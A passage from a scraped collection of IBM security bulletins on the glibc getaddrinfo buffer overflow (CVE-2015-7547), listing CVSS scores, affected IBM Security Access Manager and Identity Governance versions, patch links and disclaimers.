Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSGHJR\",\"label\":\"IBM Security Identity Governance and Intelligence\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF004\",\"label\":\"Appliance\"}],\"Version\":\"5.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:40:07", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM Identity Security Governance (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-16T21:40:07", "id": "57D4D5784CAAE70A1B1FA0264C55B10A1EDA6227EBFF271C69ACFB06AC8496F5", "href": "https://www.ibm.com/support/pages/node/543617", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:16:06", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Security Access Manager for Web. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Security Access Manager for Web 7.0 (appliances) \n\nIBM Security Access Manager for Web 8.0, all firmware versions\n\nIBM Security Access Manager for Web 9.0, all firmware versions\n\n## Remediation/Fixes\n\nThe table below provides links to patches for all affected versions. Follow the installation instructions in the README file included with the patch. \n \n\n\n**Product**| **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nIBM Security Access Manager for Web| 7.0 (appliance)| IV81894| 1\\. Apply Interim Fix 22: \n[7.0.0-ISS-WGA-IF0022](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=7.0.0&platform=All&function=all>) \nIBM Security Access Manager for Web| 8.0.0.0 - \n8.0.1.3| IV81882| 1\\. For 8.0-8.0.1.2 environments, upgrade to 8.0.1.3: \n[8.0.1-ISS-WGA-FP0003](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=8.0&platform=All&function=all>)** ** \n2\\. Apply 8.0.1.3 Interim Fix 5:[_8.0.1.3-ISS-WGA-IF0005_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=8.0.1.3&platform=All&function=all>) \nIBM Security Access Manager| 9.0| IV81837| 1\\. For 9.0 environments, upgrade to 9.0.0.1: \n[9.0.0-ISS-ISAM-FP0001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=9.0.0.0&platform=Linux&function=all>) \n2\\. Apply 9.0.0.1 Interim Fix 2: \n[_9.0.0.1-ISS-ISAM-IF0002_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=9.0.0.0&platform=All&function=all>) \n \nOnce updates have been applied, any process using glibc will need to be restarted. Given that nearly all system processes use glibc, rebooting after upgrading is suggested. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of glibc including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone.\n\n## Change History\n\n29 February 2016: Original version published.\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSPREK\",\"label\":\"Tivoli Access Manager for e-business\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF004\",\"label\":\"Appliance\"}],\"Version\":\"7.0;8.0;8.0.0.2;8.0.0.4;8.0.0.5;8.0.1;8.0.1.2;8.0.1.3;9.0;9.0.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:39:55", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-16T21:39:55", "id": "C86B188A7127CAE85E5FDBF3B4916053805066D60BD01903963131F95128AC82", "href": "https://www.ibm.com/support/pages/node/542761", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:16:09", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Security Access Manager for Mobile.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Security Access Manager for Mobile version 8, all firmware versions \n\nIBM Security Access Manager for Mobile version 9, all firmware versions\n\n## Remediation/Fixes\n\nThe table below provides links to patches for all affected versions. Follow the installation instructions in the README file included with the patch. \n \n\n\n**Product**| **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nIBM Security Access Manager for Mobile| 8.0.0.0 - \n8.0.1.3| IV81889| 1\\. For 8.0-8.0.1.2 environments, upgrade to 8.0.1.3: \n[8.0.1-ISS-ISAM-FP0003](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Security+Access+Manager+for+Mobile&release=8.0&platform=Linux&function=all>) \n2\\. Apply 8.0.1.3 Interim Fix 5: \n[8.0.1.3-ISS-ISAM-IF0005 ](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Security+Access+Manager+for+Mobile&release=8.0.1.3&platform=Linux&function=all>) \nIBM Security Access Manager| 9.0| IV81837| 1\\. For 9.0 environments, upgrade to 9.0.0.1: \n[9.0.0-ISS-ISAM-FP0001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=9.0.0.0&platform=Linux&function=all>) \n2\\. Apply 9.0.0.1 Interim Fix 2: \n[_9.0.0.1-ISS-ISAM-IF0002_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Access+Manager+for+e-business&release=9.0.0.0&platform=All&function=all>) \n \nOnce updates have been applied, any process using glibc will need to be restarted. Given that nearly all system processes use glibc, rebooting after upgrading is suggested. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of glibc including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone.\n\n## Change History\n\n29 February 2016: Original version published.\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are